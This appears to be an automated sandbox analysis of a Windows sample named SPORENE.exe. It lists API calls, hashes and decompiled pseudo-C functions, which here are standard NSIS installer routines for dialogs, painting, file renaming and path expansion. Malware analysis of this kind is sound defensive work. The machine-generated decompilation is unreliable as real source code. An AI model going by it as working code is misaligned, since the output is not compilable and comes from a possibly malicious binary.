                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                • ShowWindow.USER32(?,0000000A), ref: 00404456
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                • String ID:
                • API String ID: 1860320154-0
                • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                				intOrPtr _v8;
                				int _v12;
                				void* _v16;
                				struct HWND__* _t56;
                				signed int _t75;
                				signed short* _t76;
                				signed short* _t78;
                				long _t92;
                				int _t103;
                				signed int _t110;
                				intOrPtr _t113;
                				WCHAR* _t114;
                				signed int* _t116;
                				WCHAR* _t117;
                				struct HWND__* _t118;
                
                				if(_a8 != 0x110) {
                					if(_a8 != 0x111) {
                						L13:
                						if(_a8 != 0x4e) {
                							if(_a8 == 0x40b) {
                								 *0x42b234 =  *0x42b234 + 1;
                							}
                							L27:
                							_t114 = _a16;
                							L28:
                							return E00404500(_a8, _a12, _t114);
                						}
                						_t56 = GetDlgItem(_a4, 0x3e8);
                						_t114 = _a16;
                						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                							_v12 = _t103;
                							_v16 = _t113;
                							_v8 = 0x432ea0;
                							if(_t103 - _t113 < 0x800) {
                								SendMessageW(_t56, 0x44b, 0,  &_v16);
                								SetCursor(LoadCursorW(0, 0x7f02));
                								_push(1);
                								E00404907(_a4, _v8);
                								SetCursor(LoadCursorW(0, 0x7f00));
                								_t114 = _a16;
                							}
                						}
                						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                							goto L28;
                						} else {
                							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                								SendMessageW( *0x434f08, 0x111, 1, 0);
                							}
                							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                								SendMessageW( *0x434f08, 0x10, 0, 0);
                							}
                							return 1;
                						}
                					}
                					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                						goto L27;
                					} else {
                						_t116 =  *0x42c240 + 0x14;
                						if(( *_t116 & 0x00000020) == 0) {
                							goto L27;
                						}
                						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                						E004048E3();
                						goto L13;
                					}
                				}
                				_t117 = _a16;
                				_t75 =  *(_t117 + 0x30);
                				if(_t75 < 0) {
                					_t75 =  *( *0x433edc - 4 + _t75 * 4);
                				}
                				_t76 =  *0x434f38 + _t75 * 2;
                				_t110 =  *_t76 & 0x0000ffff;
                				_a8 = _t110;
                				_t78 =  &(_t76[1]);
                				_a16 = _t78;
                				_v16 = _t78;
                				_v12 = 0;
                				_v8 = E00404609;
                				if(_t110 != 2) {
                					_v8 = E004045CF;
                				}
                				_push( *((intOrPtr*)(_t117 + 0x34)));
                				_push(0x22);
                				E00404499(_a4);
                				_push( *((intOrPtr*)(_t117 + 0x38)));
                				_push(0x23);
                				E00404499(_a4);
                				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                				_t118 = GetDlgItem(_a4, 0x3e8);
                				E004044CE(_t118);
                				SendMessageW(_t118, 0x45b, 1, 0);
                				_t92 =  *( *0x434f10 + 0x68);
                				if(_t92 < 0) {
                					_t92 = GetSysColor( ~_t92);
                				}
                				SendMessageW(_t118, 0x443, 0, _t92);
                				SendMessageW(_t118, 0x445, 0, 0x4010000);
                				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                				 *0x42b234 = 0;
                				SendMessageW(_t118, 0x449, _a8,  &_v16);
                				 *0x42b234 = 0;
                				return 0;
                			}

                APIs
                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                • GetDlgItem.USER32 ref: 0040470A
                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                • GetSysColor.USER32(?), ref: 00404738
                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                • lstrlenW.KERNEL32(?), ref: 00404759
                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                • GetDlgItem.USER32 ref: 004047D4
                • SendMessageW.USER32(00000000), ref: 004047DB
                • GetDlgItem.USER32 ref: 00404806
                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                • SetCursor.USER32(00000000), ref: 0040485A
                • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                • SetCursor.USER32(00000000), ref: 00404876
                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\SPORENE.exe$N
                • API String ID: 3103080414-567280382
                • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                				struct tagLOGBRUSH _v16;
                				struct tagRECT _v32;
                				struct tagPAINTSTRUCT _v96;
                				struct HDC__* _t70;
                				struct HBRUSH__* _t87;
                				struct HFONT__* _t94;
                				long _t102;
                				signed int _t126;
                				struct HDC__* _t128;
                				intOrPtr _t130;
                
                				if(_a8 == 0xf) {
                					_t130 =  *0x434f10;
                					_t70 = BeginPaint(_a4,  &_v96);
                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                					_a8 = _t70;
                					GetClientRect(_a4,  &_v32);
                					_t126 = _v32.bottom;
                					_v32.bottom = _v32.bottom & 0x00000000;
                					while(_v32.top < _t126) {
                						_a12 = _t126 - _v32.top;
                						asm("cdq");
                						asm("cdq");
                						asm("cdq");
                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                						_t87 = CreateBrushIndirect( &_v16);
                						_v32.bottom = _v32.bottom + 4;
                						_a16 = _t87;
                						FillRect(_a8,  &_v32, _t87);
                						DeleteObject(_a16);
                						_v32.top = _v32.top + 4;
                					}
                					if( *(_t130 + 0x58) != 0xffffffff) {
                						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                						_a16 = _t94;
                						if(_t94 != 0) {
                							_t128 = _a8;
                							_v32.left = 0x10;
                							_v32.top = 8;
                							SetBkMode(_t128, 1);
                							SetTextColor(_t128,  *(_t130 + 0x58));
                							_a8 = SelectObject(_t128, _a16);
                							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                							SelectObject(_t128, _a8);
                							DeleteObject(_a16);
                						}
                					}
                					EndPaint(_a4,  &_v96);
                					return 0;
                				}
                				_t102 = _a16;
                				if(_a8 == 0x46) {
                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                				}
                				return DefWindowProcW(_a4, _a8, _a12, _t102);
                			}

                APIs
                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                • BeginPaint.USER32(?,?), ref: 00401047
                • GetClientRect.USER32 ref: 0040105B
                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                • FillRect.USER32 ref: 004010E4
                • DeleteObject.GDI32(?), ref: 004010ED
                • CreateFontIndirectW.GDI32(?), ref: 00401105
                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                • SelectObject.GDI32(00000000,?), ref: 00401140
                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                • DeleteObject.GDI32(?), ref: 00401165
                • EndPaint.USER32(?,?), ref: 0040116E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                • String ID: F
                • API String ID: 941294808-1304234792
                • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00406183(void* __ecx) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				long _t12;
                				long _t24;
                				char* _t31;
                				int _t37;
                				void* _t38;
                				intOrPtr* _t39;
                				long _t42;
                				WCHAR* _t44;
                				void* _t46;
                				void* _t48;
                				void* _t49;
                				void* _t52;
                				void* _t53;
                
                				_t38 = __ecx;
                				_t44 =  *(_t52 + 0x14);
                				 *0x430908 = 0x55004e;
                				 *0x43090c = 0x4c;
                				if(_t44 == 0) {
                					L3:
                					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                					if(_t12 != 0 && _t12 <= 0x400) {
                						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                						_t53 = _t52 + 0x10;
                						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                						_t48 = _t12;
                						 *(_t53 + 0x18) = _t48;
                						if(_t48 != 0xffffffff) {
                							_t42 = GetFileSize(_t48, 0);
                							_t6 = _t37 + 0xa; // 0xa
                							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                								L18:
                								return CloseHandle(_t48);
                							} else {
                								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                									if(_t49 == 0) {
                										_t48 =  *(_t53 + 0x18);
                										L16:
                										_t24 = _t42;
                										L17:
                										E00405FE8(_t24 + _t46, 0x430508, _t37);
                										SetFilePointer(_t48, 0, 0, 0);
                										E004060DF(_t48, _t46, _t42 + _t37);
                										GlobalFree(_t46);
                										goto L18;
                									}
                									_t39 = _t46 + _t42;
                									_t31 = _t39 + _t37;
                									while(_t39 > _t49) {
                										 *_t31 =  *_t39;
                										_t31 = _t31 - 1;
                										_t39 = _t39 - 1;
                									}
                									_t24 = _t49 - _t46 + 1;
                									_t48 =  *(_t53 + 0x18);
                									goto L17;
                								}
                								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                								_t42 = _t42 + 0xa;
                								goto L16;
                							}
                						}
                					}
                				} else {
                					CloseHandle(E0040602D(_t44, 0, 1));
                					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                					if(_t12 != 0 && _t12 <= 0x400) {
                						goto L3;
                					}
                				}
                				return _t12;
                			}

                APIs
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                • GetShortPathNameW.KERNEL32 ref: 004061C7
                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                • GetShortPathNameW.KERNEL32 ref: 004061E4
                • wsprintfA.USER32 ref: 00406202
                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                • GlobalFree.KERNEL32 ref: 004062EB
                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                • String ID: %ls=%ls$[Rename]
                • API String ID: 2171350718-461813615
                • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                				struct _ITEMIDLIST* _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _t44;
                				WCHAR* _t45;
                				signed char _t47;
                				signed int _t48;
                				short _t59;
                				short _t61;
                				short _t63;
                				void* _t71;
                				signed int _t77;
                				signed int _t78;
                				short _t81;
                				short _t82;
                				signed char _t84;
                				signed int _t85;
                				void* _t98;
                				void* _t104;
                				intOrPtr* _t105;
                				void* _t107;
                				WCHAR* _t108;
                				void* _t110;
                
                				_t107 = __esi;
                				_t104 = __edi;
                				_t71 = __ebx;
                				_t44 = _a8;
                				if(_t44 < 0) {
                					_t44 =  *( *0x433edc - 4 + _t44 * 4);
                				}
                				_push(_t71);
                				_push(_t107);
                				_push(_t104);
                				_t105 =  *0x434f38 + _t44 * 2;
                				_t45 = 0x432ea0;
                				_t108 = 0x432ea0;
                				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                					_t108 = _a4;
                					_a4 = _a4 & 0x00000000;
                				}
                				_t81 =  *_t105;
                				_a8 = _t81;
                				if(_t81 == 0) {
                					L43:
                					 *_t108 =  *_t108 & 0x00000000;
                					if(_a4 == 0) {
                						return _t45;
                					}
                					return E0040653D(_a4, _t45);
                				} else {
                					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                						_t98 = 2;
                						_t105 = _t105 + _t98;
                						if(_t81 >= 4) {
                							if(__eflags != 0) {
                								 *_t108 = _t81;
                								_t108 = _t108 + _t98;
                								__eflags = _t108;
                							} else {
                								 *_t108 =  *_t105;
                								_t108 = _t108 + _t98;
                								_t105 = _t105 + _t98;
                							}
                							L42:
                							_t82 =  *_t105;
                							_a8 = _t82;
                							if(_t82 != 0) {
                								_t81 = _a8;
                								continue;
                							}
                							goto L43;
                						}
                						_t84 =  *((intOrPtr*)(_t105 + 1));
                						_t47 =  *_t105;
                						_t48 = _t47 & 0x000000ff;
                						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                						_t85 = _t84 & 0x000000ff;
                						_v28 = _t48 | 0x00008000;
                						_t77 = 2;
                						_v16 = _t85;
                						_t105 = _t105 + _t77;
                						_v24 = _t48;
                						_v20 = _t85 | 0x00008000;
                						if(_a8 != _t77) {
                							__eflags = _a8 - 3;
                							if(_a8 != 3) {
                								__eflags = _a8 - 1;
                								if(__eflags == 0) {
                									__eflags = (_t48 | 0xffffffff) - _v12;
                									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                								}
                								L38:
                								_t108 =  &(_t108[lstrlenW(_t108)]);
                								_t45 = 0x432ea0;
                								goto L42;
                							}
                							_t78 = _v12;
                							__eflags = _t78 - 0x1d;
                							if(_t78 != 0x1d) {
                								__eflags = (_t78 << 0xb) + 0x436000;
                								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                							} else {
                								E00406484(_t108,  *0x434f08);
                							}
                							__eflags = _t78 + 0xffffffeb - 7;
                							if(__eflags < 0) {
                								L29:
                								E004067C4(_t108);
                							}
                							goto L38;
                						}
                						if( *0x434f84 != 0) {
                							_t77 = 4;
                						}
                						_t121 = _t48;
                						if(_t48 >= 0) {
                							__eflags = _t48 - 0x25;
                							if(_t48 != 0x25) {
                								__eflags = _t48 - 0x24;
                								if(_t48 == 0x24) {
                									GetWindowsDirectoryW(_t108, 0x400);
                									_t77 = 0;
                								}
                								while(1) {
                									__eflags = _t77;
                									if(_t77 == 0) {
                										goto L26;
                									}
                									_t59 =  *0x434f04;
                									_t77 = _t77 - 1;
                									__eflags = _t59;
                									if(_t59 == 0) {
                										L22:
                										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                										__eflags = _t61;
                										if(_t61 != 0) {
                											L24:
                											 *_t108 =  *_t108 & 0x00000000;
                											__eflags =  *_t108;
                											continue;
                										}
                										__imp__SHGetPathFromIDListW(_v8, _t108);
                										_a8 = _t61;
                										__imp__CoTaskMemFree(_v8);
                										__eflags = _a8;
                										if(_a8 != 0) {
                											goto L26;
                										}
                										goto L24;
                									}
                									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                									__eflags = _t63;
                									if(_t63 == 0) {
                										goto L26;
                									}
                									goto L22;
                								}
                								goto L26;
                							}
                							GetSystemDirectoryW(_t108, 0x400);
                							goto L26;
                						} else {
                							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                							if( *_t108 != 0) {
                								L27:
                								if(_v16 == 0x1a) {
                									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                								}
                								goto L29;
                							}
                							E0040657A(_t77, _t105, _t108, _t108, _v16);
                							L26:
                							if( *_t108 == 0) {
                								goto L29;
                							}
                							goto L27;
                						}
                					}
                					goto L43;
                				}
                			}

                APIs
                • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000400), ref: 00406695
                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,?,747DEA30), ref: 004066A8
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: Directory$SystemWindowslstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\SPORENE.exe$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                • API String ID: 4260037668-2439783390
                • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                				struct tagLOGBRUSH _v16;
                				long _t39;
                				long _t41;
                				void* _t44;
                				signed char _t50;
                				long* _t54;
                
                				if(_a4 + 0xfffffecd > 5) {
                					L18:
                					return 0;
                				}
                				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                					goto L18;
                				} else {
                					_t50 = _t54[5];
                					if((_t50 & 0xffffffe0) != 0) {
                						goto L18;
                					}
                					_t39 =  *_t54;
                					if((_t50 & 0x00000002) != 0) {
                						_t39 = GetSysColor(_t39);
                					}
                					if((_t54[5] & 0x00000001) != 0) {
                						SetTextColor(_a8, _t39);
                					}
                					SetBkMode(_a8, _t54[4]);
                					_t41 = _t54[1];
                					_v16.lbColor = _t41;
                					if((_t54[5] & 0x00000008) != 0) {
                						_t41 = GetSysColor(_t41);
                						_v16.lbColor = _t41;
                					}
                					if((_t54[5] & 0x00000004) != 0) {
                						SetBkColor(_a8, _t41);
                					}
                					if((_t54[5] & 0x00000010) != 0) {
                						_v16.lbStyle = _t54[2];
                						_t44 = _t54[3];
                						if(_t44 != 0) {
                							DeleteObject(_t44);
                						}
                						_t54[3] = CreateBrushIndirect( &_v16);
                					}
                					return _t54[3];
                				}
                			}

                APIs
                • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                • GetSysColor.USER32(00000000), ref: 0040455B
                • SetTextColor.GDI32(?,00000000), ref: 00404567
                • SetBkMode.GDI32(?,?), ref: 00404573
                • GetSysColor.USER32(?), ref: 00404586
                • SetBkColor.GDI32(?,?), ref: 00404596
                • DeleteObject.GDI32(?), ref: 004045B0
                • CreateBrushIndirect.GDI32(?), ref: 004045BA
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                				intOrPtr _t65;
                				intOrPtr _t66;
                				intOrPtr _t72;
                				void* _t76;
                				void* _t79;
                
                				_t72 = __edx;
                				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                				_t65 = 2;
                				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                				_t66 = E00402D84(_t65);
                				_t79 = _t66 - 1;
                				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                				if(_t79 < 0) {
                					L36:
                					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                				} else {
                					__ecx = 0x3ff;
                					if(__eax > 0x3ff) {
                						 *(__ebp - 0x44) = 0x3ff;
                					}
                					if( *__edi == __bx) {
                						L34:
                						__ecx =  *(__ebp - 0xc);
                						__eax =  *(__ebp - 8);
                						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                						if(_t79 == 0) {
                							 *(_t76 - 4) = 1;
                						}
                						goto L36;
                					} else {
                						 *(__ebp - 0x38) = __ebx;
                						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                						if( *(__ebp - 0x44) > __ebx) {
                							do {
                								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                										__eax = __ebp - 0x50;
                										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                											goto L34;
                										} else {
                											goto L21;
                										}
                									} else {
                										goto L34;
                									}
                								} else {
                									__eax = __ebp - 0x40;
                									_push(__ebx);
                									_push(__ebp - 0x40);
                									__eax = 2;
                									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                									if(__eax == 0) {
                										goto L34;
                									} else {
                										__ecx =  *(__ebp - 0x40);
                										if(__ecx == __ebx) {
                											goto L34;
                										} else {
                											__ax =  *(__ebp + 0xa) & 0x000000ff;
                											 *(__ebp - 0x4c) = __ecx;
                											 *(__ebp - 0x50) = __eax;
                											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                												L28:
                												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                											} else {
                												__ebp - 0x50 = __ebp + 0xa;
                												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                													L21:
                													__eax =  *(__ebp - 0x50);
                												} else {
                													__edi =  *(__ebp - 0x4c);
                													__edi =  ~( *(__ebp - 0x4c));
                													while(1) {
                														_t22 = __ebp - 0x40;
                														 *_t22 =  *(__ebp - 0x40) - 1;
                														__eax = 0xfffd;
                														 *(__ebp - 0x50) = 0xfffd;
                														if( *_t22 == 0) {
                															goto L22;
                														}
                														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                														__edi = __edi + 1;
                														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                														__eax = __ebp + 0xa;
                														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                															continue;
                														} else {
                															goto L21;
                														}
                														goto L22;
                													}
                												}
                												L22:
                												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                													goto L28;
                												} else {
                													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                														} else {
                															__ecx =  *(__ebp - 0xc);
                															__edx =  *(__ebp - 8);
                															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                														}
                														goto L34;
                													} else {
                														__ecx =  *(__ebp - 0xc);
                														__edx =  *(__ebp - 8);
                														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                														 *(__ebp - 0x38) = __eax;
                														if(__ax == __bx) {
                															goto L34;
                														} else {
                															goto L26;
                														}
                													}
                												}
                											}
                										}
                									}
                								}
                								goto L37;
                								L26:
                								__eax =  *(__ebp - 8);
                							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                						}
                						goto L34;
                					}
                				}
                				L37:
                				return 0;
                			}









                APIs
